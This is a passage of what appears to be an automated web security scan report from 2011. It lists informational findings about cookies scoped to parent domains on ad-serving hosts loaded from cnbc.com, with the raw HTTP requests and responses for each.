src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1...[SNIP]...
12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:51:56 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 15:51:56 GMT Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3...[SNIP]...
12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:26:14 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:26:15 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3...[SNIP]...
12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342934886&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 16:02:17 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 16:02:17 GMT Connection: closeSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:02:17 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=4...[SNIP]...
12.55. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341697956&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:41:40 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:41:40 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:41:40 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=6...[SNIP]...
12.56. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:21:07 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:21:07 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:21:07 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7...[SNIP]...
12.57. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:15:56 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 559 Date: Tue, 06 Sep 2011 15:15:56 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:15:56 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7...[SNIP]...
12.58. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:31:23 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:31:23 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:31:23 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=8...[SNIP]...
12.59. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://r1-ads.ace.advertising.com
Path:
/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1 Host: r1-ads.ace.advertising.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.1017217.768033.0XMC Cache-Control: private, max-age=0, no-cache Expires: Tue, 06 Sep 2011 15:57:07 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 561 Date: Tue, 06 Sep 2011 15:57:07 GMT Connection: close Vary: Accept-EncodingSet-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:57:07 GMT; path=/ Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=9...[SNIP]...
12.60. http://rt.legolas-media.com/lgrt
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rt.legolas-media.com
Path:
/lgrt
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1 Host: rt.legolas-media.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgtix=BgABADMBSQABADMBHAAEADUBDAABADMB/QABADABXwABADMB
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:55:10 GMT Server: Apache Expires: -1 Cache-Control: no-cache; no-store Content-Type: application/javascriptSet-Cookie: lgtix=BgABADMBSQABADMBHAAGADUBDAABADMB/QABADABXwABADMB; path=/; expires=Fri, 05 Sep 2014 14:55:10 GMT; domain=.legolas-media.com P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Content-Length: 5 Connection: close true;
12.61. http://search.spotxchange.com/track/tag/6382.1008/img
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://search.spotxchange.com
Path:
/track/tag/6382.1008/img
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:history-0=eNrVkttygjAQhq%2Ftu7STEMXSOygBwxQyxcghdxi0BhCY6UHJ0zdKDw%2FQ2pleJrv%2Fv%2F9%2Bs8z2byCE08mdY06vlzgm9gPh2L3LWado%2B6JohRWVARB7ryqM5pVDC2wypyHVqRaapI13fCBzobpj6HayyCJVpsmW%2Bx7gSzIvmP5XGFAmUKjIjKLQjFgny733XKYrSQ1sRlU%2F6lUn8zQ2eBYA7dOIxur5%2FdkbUEmMyBVonIsNnanOs3iXIWdYI95zPxkyo6nHum0S%2BZ1JLII3joLdOvnyg1qvhK93Gd8nP5Cn5bZIH3Wm2gwZPkbuedb0syb2ScXTWbVJrGazcHrR1h%2B95HDeS%2Bcvfa%2FNUKJOu2tfNWqFpAhaEzbSnl2etlsPkbsC%2F4o2uwRtAG4vTRvqu1aRm6Of0A7V0%2FB3tO0D%2FeXbvnoHx%2BZvDQ%3D%3D; expires=Wed, 04-Jan-2012 15:37:47 GMT; path=/; domain=.spotxchange.com 